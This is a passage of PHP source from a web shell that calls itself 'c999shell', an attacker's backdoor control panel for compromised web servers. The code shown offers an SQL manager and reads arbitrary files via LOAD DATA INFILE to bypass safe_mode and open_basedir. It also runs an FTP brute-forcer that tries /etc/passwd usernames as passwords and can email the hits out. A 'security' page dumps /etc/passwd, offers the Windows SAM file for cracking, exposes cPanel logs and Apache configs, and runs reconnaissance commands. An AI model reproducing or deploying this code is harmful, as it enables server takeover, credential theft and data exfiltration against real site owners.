1153 if (empty($sql_tbl_ls)) {$sql_tbl_ls = 0;}
1154 if (empty($sql_tbl_le)) {$sql_tbl_le = 30;}
1155 $perpage = $sql_tbl_le - $sql_tbl_ls;
1156 if (!is_numeric($perpage)) {$perpage = 10;}
1157 $numpages = $count_row[0]/$perpage;
1158 $e = explode(" ",$sql_order);
1159 if (count($e) == 2)
1160 {
1161 if ($e[0] == "d") {$asc_desc = "DESC";}
1162 else {$asc_desc = "ASC";}
1163 $v = "ORDER BY `".$e[1]."` ".$asc_desc." ";
1164 }
1165 else {$v = "";}
1166 $query = "SELECT * FROM `".$sql_tbl."` ".$v."LIMIT ".$sql_tbl_ls." , ".$perpage."";
1167 $result = mysql_query($query) or print(mysql_smarterror());
1168 echo "<hr size=\"1\" noshade><center><b>Table ".htmlspecialchars($sql_tbl)." (".mysql_num_fields($result)." cols and ".$count_row[0]." rows)</b></center>";
1169 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=structure\">[&nbsp;<b>Structure</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1170 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=browse\">[&nbsp;<b>Browse</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1171 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_act=tbldump&thistbl=1\">[&nbsp;<b>Dump</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1172 echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_tbl_act=insert\">[&nbsp;<b>Insert</b>&nbsp;]</a>&nbsp;&nbsp;&nbsp;";
1173 if ($sql_tbl_act == "structure") {echo "<br><br><b>Coming sooon!</b>";}
1174 if ($sql_tbl_act == "insert")
1175 {
1176 if (!is_array($sql_tbl_insert)) {$sql_tbl_insert = array();}
1177 if (!empty($sql_tbl_insert_radio))
1178 {
1179
1180 }
1181 else
1182 {
1183 echo "<br><br><b>Inserting row into table:</b><br>";
1184 if (!empty($sql_tbl_insert_q))
1185 {
1186 $sql_query = "SELECT * FROM `".$sql_tbl."`";
1187 $sql_query .= " WHERE".$sql_tbl_insert_q;
1188 $sql_query .= " LIMIT 1;";
1189 $result = mysql_query($sql_query,$sql_sock) or print("<br><br>".mysql_smarterror());
1190 $values = mysql_fetch_assoc($result);
1191 mysql_free_result($result);
1192 }
1193 else {$values = array();}
1194 echo "<form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><b>Field</b></td><td><b>Type</b></td><td><b>Function</b></td><td><b>Value</b></td></tr>";
1195 foreach ($tbl_struct_fields as $field)
1196 {
1197 $name = $field["Field"];
1198 if (empty($sql_tbl_insert_q)) {$v = "";}
1199 echo "<tr><td><b>".htmlspecialchars($name)."</b></td><td>".$field["Type"]."</td><td><select name=\"sql_tbl_insert_functs[".htmlspecialchars($name)."]\"><option value=\"\"></option><option>PASSWORD</option><option>MD5</option><option>ENCRYPT</option><option>ASCII</option><option>CHAR</option><option>RAND</option><option>LAST_INSERT_ID</option><option>COUNT</option><option>AVG</option><option>SUM</option><option value=\"\">--------</option><option>SOUNDEX</option><option>LCASE</option><option>UCASE</option><option>NOW</option><option>CURDATE</option><option>CURTIME</option><option>FROM_DAYS</option><option>FROM_UNIXTIME</option><option>PERIOD_ADD</option><option>PERIOD_DIFF</option><option>TO_DAYS</option><option>UNIX_TIMESTAMP</option><option>USER</option><option>WEEKDAY</option><option>CONCAT</option></select></td><td><input type=\"text\" name=\"sql_tbl_insert[".htmlspecialchars($name)."]\" value=\"".htmlspecialchars($values[$name])."\" size=50></td></tr>";
1200 $i++;
1201 }
1202 echo "</table><br>";
1203 echo "<input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"1\""; if (empty($sql_tbl_insert_q)) {echo " checked";} echo "><b>Insert as new row</b>";
1204 if (!empty($sql_tbl_insert_q)) {echo " or <input type=\"radio\" name=\"sql_tbl_insert_radio\" value=\"2\" checked><b>Save</b>"; echo "<input type=\"hidden\" name=\"sql_tbl_insert_q\" value=\"".htmlspecialchars($sql_tbl_insert_q)."\">";}
1205 echo "<br><br><input type=\"submit\" value=\"Confirm\"></form>";
1206 }
1207 }
1208 if ($sql_tbl_act == "browse")
1209 {
1210 $sql_tbl_ls = abs($sql_tbl_ls);
1211 $sql_tbl_le = abs($sql_tbl_le);
1212 echo "<hr size=\"1\" noshade>";
1213 echo "<img src=\"".$surl."act=img&img=multipage\" height=\"12\" width=\"10\" alt=\"Pages\">&nbsp;";
1214 $b = 0;
1215 for($i=0;$i<$numpages;$i++)
1216 {
1217 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "<a href=\"".$sql_surl."sql_tbl=".urlencode($sql_tbl)."&sql_order=".htmlspecialchars($sql_order)."&sql_tbl_ls=".($i*$perpage)."&sql_tbl_le=".($i*$perpage+$perpage)."\"><u>";}
1218 echo $i;
1219 if (($i*$perpage != $sql_tbl_ls) or ($i*$perpage+$perpage != $sql_tbl_le)) {echo "</u></a>";}
1220 if (($i/30 == round($i/30)) and ($i > 0)) {echo "<br>";}
1221 else {echo "&nbsp;";}
1222 }
1223 if ($i == 0) {echo "empty";}
1224 echo "<form method=\"GET\"><input type=\"hidden\" name=\"act\" value=\"sql\"><input type=\"hidden\" name=\"sql_db\" value=\"".htmlspecialchars($sql_db)."\"><input type=\"hidden\" name=\"sql_login\" value=\"".htmlspecialchars($sql_login)."\"><input type=\"hidden\" name=\"sql_passwd\" value=\"".htmlspecialchars($sql_passwd)."\"><input type=\"hidden\" name=\"sql_server\" value=\"".htmlspecialchars($sql_server)."\"><input type=\"hidden\" name=\"sql_port\" value=\"".htmlspecialchars($sql_port)."\"><input type=\"hidden\" name=\"sql_tbl\" value=\"".htmlspecialchars($sql_tbl)."\"><input type=\"hidden\" name=\"sql_order\" value=\"".htmlspecialchars($sql_order)."\"><b>From:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_ls\" value=\"".$sql_tbl_ls."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"sql_tbl_le\" value=\"".$sql_tbl_le."\">&nbsp;<input type=\"submit\" value=\"View\"></form>";
1225 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"1%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1>";
1226 echo "<tr>";
1227 echo "<td><input type=\"checkbox\" name=\"boxrow_all\" value=\"1\"></td>";
1228 for ($i=0;$i<mysql_num_fields($result);$i++)
1229 {
1230 $v = mysql_field_name($result,$i);
1231 if ($e[0] == "a") {$s = "d"; $m = "asc";}
1232 else {$s = "a"; $m = "desc";}
1233 echo "<td>";
1234 if (empty($e[0])) {$e[0] = "a";}
1235 if ($e[1] != $v) {echo "<a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$e[0]."%20".$v."\"><b>".$v."</b></a>";}
1236 else {echo "<b>".$v."</b><a href=\"".$sql_surl."sql_tbl=".$sql_tbl."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_ls=".$sql_tbl_ls."&sql_order=".$s."%20".$v."\"><img src=\"".$surl."act=img&img=sort_".$m."\" height=\"9\" width=\"14\" alt=\"".$m."\"></a>";}
1237 echo "</td>";
1238 }
1239 echo "<td><font color=\"green\"><b>Action</b></font></td>";
1240 echo "</tr>";
1241 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1242 {
1243 echo "<tr>";
1244 $w = "";
1245 $i = 0;
1246 foreach ($row as $k=>$v) {$name = mysql_field_name($result,$i); $w .= " `".$name."` = '".addslashes($v)."' AND"; $i++;}
1247 if (count($row) > 0) {$w = substr($w,0,strlen($w)-3);}
1248 echo "<td><input type=\"checkbox\" name=\"boxrow[]\" value=\"".$w."\"></td>";
1249 $i = 0;
1250 foreach ($row as $k=>$v)
1251 {
1252 $v = htmlspecialchars($v);
1253 if ($v == "") {$v = "<font color=\"green\">NULL</font>";}
1254 echo "<td>".$v."</td>";
1255 $i++;
1256 }
1257 echo "<td>";
1258 echo "<a href=\"".$sql_surl."sql_act=query&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_query=".urlencode("DELETE FROM `".$sql_tbl."` WHERE".$w." LIMIT 1;")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Delete\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;";
1259 echo "<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".urlencode($sql_tbl)."&sql_tbl_ls=".$sql_tbl_ls."&sql_tbl_le=".$sql_tbl_le."&sql_tbl_insert_q=".urlencode($w)."\"><img src=\"".$surl."act=img&img=change\" alt=\"Edit\" height=\"14\" width=\"14\" border=\"0\"></a>&nbsp;";
1260 echo "</td>";
1261 echo "</tr>";
1262 }
1263 mysql_free_result($result);
1264 echo "</table><hr size=\"1\" noshade><p align=\"left\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1265 echo "<option value=\"\">With selected:</option>";
1266 echo "<option value=\"deleterow\">Delete</option>";
1267 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1268 }
1269 }
1270 else
1271 {
1272 $result = mysql_query("SHOW TABLE STATUS", $sql_sock);
1273 if (!$result) {echo mysql_smarterror();}
1274 else
1275 {
1276 echo "<br><form method=\"POST\"><TABLE cellSpacing=0 borderColorDark=#666666 cellPadding=5 width=\"100%\" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr><td><input type=\"checkbox\" name=\"boxtbl_all\" value=\"1\"></td><td><center><b>Table</b></center></td><td><b>Rows</b></td><td><b>Type</b></td><td><b>Created</b></td><td><b>Modified</b></td><td><b>Size</b></td><td><b>Action</b></td></tr>";
1277 $i = 0;
1278 $tsize = $trows = 0;
1279 while ($row = mysql_fetch_array($result, MYSQL_ASSOC))
1280 {
1281 $tsize += $row["Data_length"];
1282 $trows += $row["Rows"];
1283 $size = view_size($row["Data_length"]);
1284 echo "<tr>";
1285 echo "<td><input type=\"checkbox\" name=\"boxtbl[]\" value=\"".$row["Name"]."\"></td>";
1286 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_tbl=".urlencode($row["Name"])."\"><b>".$row["Name"]."</b></a>&nbsp;</td>";
1287 echo "<td>".$row["Rows"]."</td>";
1288 echo "<td>".$row["Type"]."</td>";
1289 echo "<td>".$row["Create_time"]."</td>";
1290 echo "<td>".$row["Update_time"]."</td>";
1291 echo "<td>".$size."</td>";
1292 echo "<td>&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DELETE FROM `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_empty\" alt=\"Empty\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;&nbsp;<a href=\"".$sql_surl."sql_act=query&sql_query=".urlencode("DROP TABLE `".$row["Name"]."`")."\"><img src=\"".$surl."act=img&img=sql_button_drop\" alt=\"Drop\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;<a href=\"".$sql_surl."sql_tbl_act=insert&sql_tbl=".$row["Name"]."\"><img src=\"".$surl."act=img&img=sql_button_insert\" alt=\"Insert\" height=\"13\" width=\"11\" border=\"0\"></a>&nbsp;</td>";
1293 echo "</tr>";
1294 $i++;
1295 }
1296 echo "<tr bgcolor=\"000000\">";
1297 echo "<td><center><b>»</b></center></td>";
1298 echo "<td><center><b>".$i." table(s)</b></center></td>";
1299 echo "<td><b>".$trows."</b></td>";
1300 echo "<td>".$row[1]."</td>";
1301 echo "<td>".$row[10]."</td>";
1302 echo "<td>".$row[11]."</td>";
1303 echo "<td><b>".view_size($tsize)."</b></td>";
1304 echo "<td></td>";
1305 echo "</tr>";
1306 echo "</table><hr size=\"1\" noshade><p align=\"right\"><img src=\"".$surl."act=img&img=arrow_ltr\" border=\"0\"><select name=\"sql_act\">";
1307 echo "<option value=\"\">With selected:</option>";
1308 echo "<option value=\"tbldrop\">Drop</option>";
1309 echo "<option value=\"tblempty\">Empty</option>";
1310 echo "<option value=\"tbldump\">Dump</option>";
1311 echo "<option value=\"tblcheck\">Check table</option>";
1312 echo "<option value=\"tbloptimize\">Optimize table</option>";
1313 echo "<option value=\"tblrepair\">Repair table</option>";
1314 echo "<option value=\"tblanalyze\">Analyze table</option>";
1315 echo "</select>&nbsp;<input type=\"submit\" value=\"Confirm\"></form></p>";
1316 mysql_free_result($result);
1317 }
1318 }
1319 }
1320 }
1321 }
1322 else
1323 {
1324 $acts = array("","newdb","serverstatus","servervars","processes","getfile");
1325 if (in_array($sql_act,$acts)) {?><table border="0" width="100%" height="1"><tr><td width="30%" height="1"><b>Create new DB:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="newdb"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_newdb" size="20">&nbsp;<input type="submit" value="Create"></form></td><td width="30%" height="1"><b>View File:</b><form action="<?php echo $surl; ?>"><input type="hidden" name="act" value="sql"><input type="hidden" name="sql_act" value="getfile"><input type="hidden" name="sql_login" value="<?php echo htmlspecialchars($sql_login); ?>"><input type="hidden" name="sql_passwd" value="<?php echo htmlspecialchars($sql_passwd); ?>"><input type="hidden" name="sql_server" value="<?php echo htmlspecialchars($sql_server); ?>"><input type="hidden" name="sql_port" value="<?php echo htmlspecialchars($sql_port); ?>"><input type="text" name="sql_getfile" size="30" value="<?php echo htmlspecialchars($sql_getfile); ?>">&nbsp;<input type="submit" value="Get"></form></td><td width="30%" height="1"></td></tr><tr><td width="30%" height="1"></td><td width="30%" height="1"></td><td width="30%" height="1"></td></tr></table><?php }
1326 if (!empty($sql_act))
1327 {
1328 echo "<hr size=\"1\" noshade>";
1329 if ($sql_act == "newdb")
1330 {
1331 echo "<b>";
1332 if ((mysql_create_db ($sql_newdb)) and (!empty($sql_newdb))) {echo "DB \"".htmlspecialchars($sql_newdb)."\" has been created with success!</b><br>";}
1333 else {echo "Can't create DB \"".htmlspecialchars($sql_newdb)."\".<br>Reason:</b> ".mysql_smarterror();}
1334 }
1335 if ($sql_act == "serverstatus")
1336 {
1337 $result = mysql_query("SHOW STATUS", $sql_sock);
1338 echo "<center><b>Server-status variables:</b><br><br>";
1339 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1340 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1341 echo "</table></center>";
1342 mysql_free_result($result);
1343 }
1344 if ($sql_act == "servervars")
1345 {
1346 $result = mysql_query("SHOW VARIABLES", $sql_sock);
1347 echo "<center><b>Server variables:</b><br><br>";
1348 echo "<TABLE cellSpacing=0 cellPadding=0 bgColor=#333333 borderColorLight=#333333 border=1><td><b>Name</b></td><td><b>Value</b></td></tr>";
1349 while ($row = mysql_fetch_array($result, MYSQL_NUM)) {echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td></tr>";}
1350 echo "</table>";
1351 mysql_free_result($result);
1352 }
1353 if ($sql_act == "processes")
1354 {
1355 if (!empty($kill)) {$query = "KILL ".$kill.";"; $result = mysql_query($query, $sql_sock); echo "<b>Killing process #".$kill."... ok. he is dead, amen.</b>";}
1356 $result = mysql_query("SHOW PROCESSLIST", $sql_sock);
1357 echo "<center><b>Processes:</b><br><br>";
1358 echo "<TABLE cellSpacing=0 cellPadding=2 bgColor=#333333 borderColorLight=#333333 border=1><td><b>ID</b></td><td><b>USER</b></td><td><b>HOST</b></td><td><b>DB</b></td><td><b>COMMAND</b></td><td><b>TIME</b></td><td><b>STATE</b></td><td><b>INFO</b></td><td><b>Action</b></td></tr>";
1359 while ($row = mysql_fetch_array($result, MYSQL_NUM)) { echo "<tr><td>".$row[0]."</td><td>".$row[1]."</td><td>".$row[2]."</td><td>".$row[3]."</td><td>".$row[4]."</td><td>".$row[5]."</td><td>".$row[6]."</td><td>".$row[7]."</td><td><a href=\"".$sql_surl."sql_act=processes&kill=".$row[0]."\"><u>Kill</u></a></td></tr>";}
1360 echo "</table>";
1361 mysql_free_result($result);
1362 }
1363 if ($sql_act == "getfile")
1364 {
1365 $tmpdb = $sql_login."_tmpdb";
1366 $select = mysql_select_db($tmpdb);
1367 if (!$select) {mysql_create_db($tmpdb); $select = mysql_select_db($tmpdb); $created = !!$select;}
1368 if ($select)
1369 {
1370 $created = FALSE;
1371 mysql_query("CREATE TABLE `tmp_file` ( `Viewing the file in safe_mode+open_basedir` LONGBLOB NOT NULL );");
1372 mysql_query("LOAD DATA INFILE \"".addslashes($sql_getfile)."\" INTO TABLE tmp_file");
1373 $result = mysql_query("SELECT * FROM tmp_file;");
1374 if (!$result) {echo "<b>Error in reading file (permision denied)!</b>";}
1375 else
1376 {
1377 for ($i=0;$i<mysql_num_fields($result);$i++) {$name = mysql_field_name($result,$i);}
1378 $f = "";
1379 while ($row = mysql_fetch_array($result, MYSQL_ASSOC)) {$f .= join ("\r\n",$row);}
1380 if (empty($f)) {echo "<b>File \"".$sql_getfile."\" does not exists or empty!</b><br>";}
1381 else {echo "<b>File \"".$sql_getfile."\":</b><br>".nl2br(htmlspecialchars($f))."<br>";}
1382 mysql_free_result($result);
1383 mysql_query("DROP TABLE tmp_file;");
1384 }
1385 }
1386 mysql_drop_db($tmpdb); //comment it if you want to leave database
1387 }
1388 }
1389 }
1390 }
1391 echo "</td></tr></table>";
1392 if ($sql_sock)
1393 {
1394 $affected = @mysql_affected_rows($sql_sock);
1395 if ((!is_numeric($affected)) or ($affected < 0)){$affected = 0;}
1396 echo "<tr><td><center><b>Affected rows: ".$affected."</center></td></tr>";
1397 }
1398 echo "</table>";
1399}
1400if ($act == "mkdir")
1401{
1402 if ($mkdir != $d)
1403 {
1404 if (file_exists($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: object alredy exists";}
1405 elseif (!mkdir($mkdir)) {echo "<b>Make Dir \"".htmlspecialchars($mkdir)."\"</b>: access denied";}
1406 echo "<br><br>";
1407 }
1408 $act = $dspact = "ls";
1409}
1410if ($act == "ftpquickbrute")
1411{
1412 echo "<b>Ftp Quick brute:</b><br>";
1413 if (!win) {echo "This functions not work in Windows!<br><br>";}
1414 else
1415 {
1416 function c999ftpbrutecheck($host,$port,$timeout,$login,$pass,$sh,$fqb_onlywithsh)
1417 {
1418 if ($fqb_onlywithsh) {$TRUE = (!in_array($sh,array("/bin/FALSE","/sbin/nologin")));}
1419 else {$TRUE = TRUE;}
1420 if ($TRUE)
1421 {
1422 $sock = @ftp_connect($host,$port,$timeout);
1423 if (@ftp_login($sock,$login,$pass))
1424 {
1425 echo "<a href=\"ftp://".$login.":".$pass."@".$host."\" target=\"_blank\"><b>Connected to ".$host." with login \"".$login."\" and password \"".$pass."\"</b></a>.<br>";
1426 ob_flush();
1427 return TRUE;
1428 }
1429 }
1430 }
1431 if (!empty($submit))
1432 {
1433 if (!is_numeric($fqb_lenght)) {$fqb_lenght = $nixpwdperpage;}
1434 $fp = fopen("/etc/passwd","r");
1435 if (!$fp) {echo "Can't get /etc/passwd for password-list.";}
1436 else
1437 {
1438 if ($fqb_logging)
1439 {
1440 if ($fqb_logfile) {$fqb_logfp = fopen($fqb_logfile,"w");}
1441 else {$fqb_logfp = FALSE;}
1442 $fqb_log = "FTP Quick Brute (called c999shell v. ".$shver.") started at ".date("d.m.Y H:i:s")."\r\n\r\n";
1443 if ($fqb_logfile) {fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1444 }
1445 ob_flush();
1446 $i = $success = 0;
1447 $ftpquick_st = getmicrotime();
1448 while(!feof($fp))
1449 {
1450 $str = explode(":",fgets($fp,2048));
1451 if (c999ftpbrutecheck("localhost",21,1,$str[0],$str[0],$str[6],$fqb_onlywithsh))
1452 {
1453 echo "<b>Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\"</b><br>";
1454 $fqb_log .= "Connected to ".getenv("SERVER_NAME")." with login \"".$str[0]."\" and password \"".$str[0]."\", at ".date("d.m.Y H:i:s")."\r\n";
1455 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1456 $success++;
1457 ob_flush();
1458 }
1459 if ($i > $fqb_lenght) {break;}
1460 $i++;
1461 }
1462 if ($success == 0) {echo "No success. connections!"; $fqb_log .= "No success. connections!\r\n";}
1463 $ftpquick_t = round(getmicrotime()-$ftpquick_st,4);
1464 echo "<hr size=\"1\" noshade><b>Done!</b><br>Total time (secs.): ".$ftpquick_t."<br>Total connections: ".$i."<br>Success.: <font color=green><b>".$success."</b></font><br>Unsuccess.:".($i-$success)."</b><br>Connects per second: ".round($i/$ftpquick_t,2)."<br>";
1465 $fqb_log .= "\r\n------------------------------------------\r\nDone!\r\nTotal time (secs.): ".$ftpquick_t."\r\nTotal connections: ".$i."\r\nSuccess.: ".$success."\r\nUnsuccess.:".($i-$success)."\r\nConnects per second: ".round($i/$ftpquick_t,2)."\r\n";
1466 if ($fqb_logfp) {fseek($fqb_logfp,0); fwrite($fqb_logfp,$fqb_log,strlen($fqb_log));}
1467 if ($fqb_logemail) {@mail($fqb_logemail,"c999shell v. ".$shver." report",$fqb_log);}
1468 fclose($fqb_logfp);
1469 }
1470 }
1471 else
1472 {
1473 $logfile = $tmpdir_logs."c999sh_ftpquickbrute_".date("d.m.Y_H_i_s").".log";
1474 $logfile = str_replace("//",DIRECTORY_SEPARATOR,$logfile);
1475 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"ftpquickbrute\"><br>Read first: <input type=text name=\"fqb_lenght\" value=\"".$nixpwdperpage."\"><br><br>Users only with shell?&nbsp;<input type=\"checkbox\" name=\"fqb_onlywithsh\" value=\"1\"><br><br>Logging?&nbsp;<input type=\"checkbox\" name=\"fqb_logging\" value=\"1\" checked><br>Logging to file?&nbsp;<input type=\"text\" name=\"fqb_logfile\" value=\"".$logfile."\" size=\"".(strlen($logfile)+2*(strlen($logfile)/10))."\"><br>Logging to e-mail?&nbsp;<input type=\"text\" name=\"fqb_logemail\" value=\"".$log_email."\" size=\"".(strlen($logemail)+2*(strlen($logemail)/10))."\"><br><br><input type=submit name=submit value=\"Brute\"></form>";
1476 }
1477 }
1478}
1479if ($act == "d")
1480{
1481 if (!is_dir($d)) {echo "<center><b>Permision denied!</b></center>";}
1482 else
1483 {
1484 echo "<b>Directory information:</b><table border=0 cellspacing=1 cellpadding=2>";
1485 if (!$win)
1486 {
1487 echo "<tr><td><b>Owner/Group</b></td><td> ";
1488 $ow = posix_getpwuid(fileowner($d));
1489 $gr = posix_getgrgid(filegroup($d));
1490 $row[] = ($ow["name"]?$ow["name"]:fileowner($d))."/".($gr["name"]?$gr["name"]:filegroup($d));
1491 }
1492 echo "<tr><td><b>Perms</b></td><td><a href=\"".$surl."act=chmod&d=".urlencode($d)."\"><b>".view_perms_color($d)."</b></a><tr><td><b>Create time</b></td><td> ".date("d/m/Y H:i:s",filectime($d))."</td></tr><tr><td><b>Access time</b></td><td> ".date("d/m/Y H:i:s",fileatime($d))."</td></tr><tr><td><b>MODIFY time</b></td><td> ".date("d/m/Y H:i:s",filemtime($d))."</td></tr></table><br>";
1493 }
1494}
1495if ($act == "phpinfo") {@ob_clean(); phpinfo(); c999shexit();}
1496if ($act == "security")
1497{
1498 echo "<center><b>Server security information:</b></center><b>Open base dir: ".$hopenbasedir."</b><br>";
1499 if (!$win)
1500 {
1501 if ($nixpasswd)
1502 {
1503 if ($nixpasswd == 1) {$nixpasswd = 0;}
1504 echo "<b>*nix /etc/passwd:</b><br>";
1505 if (!is_numeric($nixpwd_s)) {$nixpwd_s = 0;}
1506 if (!is_numeric($nixpwd_e)) {$nixpwd_e = $nixpwdperpage;}
1507 echo "<form action=\"".$surl."\"><input type=hidden name=act value=\"security\"><input type=hidden name=\"nixpasswd\" value=\"1\"><b>From:</b>&nbsp;<input type=\"text=\" name=\"nixpwd_s\" value=\"".$nixpwd_s."\">&nbsp;<b>To:</b>&nbsp;<input type=\"text\" name=\"nixpwd_e\" value=\"".$nixpwd_e."\">&nbsp;<input type=submit value=\"View\"></form><br>";
1508 $i = $nixpwd_s;
1509 while ($i < $nixpwd_e)
1510 {
1511 $uid = posix_getpwuid($i);
1512 if ($uid)
1513 {
1514 $uid["dir"] = "<a href=\"".$surl."act=ls&d=".urlencode($uid["dir"])."\">".$uid["dir"]."</a>";
1515 echo join(":",$uid)."<br>";
1516 }
1517 $i++;
1518 }
1519 }
1520 else {echo "<br><a href=\"".$surl."act=security&nixpasswd=1&d=".$ud."\"><b><u>Get /etc/passwd</u></b></a><br>";}
1521 }
1522 else
1523 {
1524 $v = $_SERVER["WINDIR"]."\repair\sam";
1525 if (file_get_contents($v)) {echo "<b><font color=red>You can't crack winnt passwords(".$v.") </font></b><br>";}
1526 else {echo "<b><font color=green>You can crack winnt passwords. <a href=\"".$surl."act=f&f=sam&d=".$_SERVER["WINDIR"]."\\repair&ft=download\"><u><b>Download</b></u></a>, and use lcp.crack+ ©.</font></b><br>";}
1527 }
1528 if (file_get_contents("/etc/userdomains")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=userdomains&d=".urlencode("/etc")."&ft=txt\"><u><b>View cpanel user-domains logs</b></u></a></font></b><br>";}
1529 if (file_get_contents("/var/cpanel/accounting.log")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=accounting.log&d=".urlencode("/var/cpanel/")."\"&ft=txt><u><b>View cpanel logs</b></u></a></font></b><br>";}
1530 if (file_get_contents("/usr/local/apache/conf/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/usr/local/apache/conf")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1531 if (file_get_contents("/etc/httpd.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=httpd.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Apache configuration (httpd.conf)</b></u></a></font></b><br>";}
1532 if (file_get_contents("/etc/syslog.conf")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=syslog.conf&d=".urlencode("/etc")."&ft=txt\"><u><b>Syslog configuration (syslog.conf)</b></u></a></font></b><br>";}
1533 if (file_get_contents("/etc/motd")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=motd&d=".urlencode("/etc")."&ft=txt\"><u><b>Message Of The Day</b></u></a></font></b><br>";}
1534 if (file_get_contents("/etc/hosts")) {echo "<b><font color=green><a href=\"".$surl."act=f&f=hosts&d=".urlencode("/etc")."&ft=txt\"><u><b>Hosts</b></u></a></font></b><br>";}
1535 function displaysecinfo($name,$value) {if (!empty($value)) {if (!empty($name)) {$name = "<b>".$name." - </b>";} echo $name.nl2br($value)."<br>";}}
1536 displaysecinfo("OS Version?",myshellexec("cat /proc/version"));
1537 displaysecinfo("Kernel version?",myshellexec("sysctl -a | grep version"));
1538 displaysecinfo("Distrib name",myshellexec("cat /etc/issue.net"));
1539 displaysecinfo("Distrib name (2)",myshellexec("cat /etc/*-realise"));
1540 displaysecinfo("CPU?",myshellexec("cat /proc/cpuinfo"));
1541 displaysecinfo("RAM",myshellexec("free -m"));
1542 displaysecinfo("HDD space",myshellexec("df -h"));
1543 displaysecinfo("List of Attributes",myshellexec("lsattr -a"));
1544 displaysecinfo("Mount options ",myshellexec("cat /etc/fstab"));
1545 displaysecinfo("Is cURL installed?",myshellexec("which curl"));
1546 displaysecinfo("Is lynx installed?",myshellexec("which lynx"));
1547 displaysecinfo("Is links installed?",myshellexec("which links"));
1548 displaysecinfo("Is fetch installed?",myshellexec("which fetch"));
1549 displaysecinfo("Is GET installed?",myshellexec("which GET"));
1550 displaysecinfo("Is perl installed?",myshellexec("which perl"));
1551 displaysecinfo("Where is apache",myshellexec("whereis apache"));
1552 displaysecinfo("Where is perl?",myshellexec("whereis perl"));
1553 displaysecinfo("locate proftpd.conf",myshellexec("locate proftpd.conf"));
1554 displaysecinfo("locate httpd.conf",myshellexec("locate httpd.conf"));
1555 displaysecinfo("locate my.conf",myshellexec("locate my.conf"));
1556 displaysecinfo("locate psybnc.conf",myshellexec("locate psybnc.conf"));
1557}
1558if ($act == "mkfile")
1559{
1560 if ($mkfile != $d)
1561 {
1562 if (file_exists($mkfile)) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: object alredy exists";}
1563 elseif (!fopen($mkfile,"w")) {echo "<b>Make File \"".htmlspecialchars($mkfile)."\"</b>: access denied";}
1564 else {$act = "f"; $d = dirname($mkfile); if (substr($d,-1) != DIRECTORY_SEPARATOR) {$d .= DIRECTORY_SEPARATOR;} $f = basename($mkfile);}
1565 }
1566 else {$act = $dspact = "ls";}
1567}
1568if ($act == "encoder")
1569{
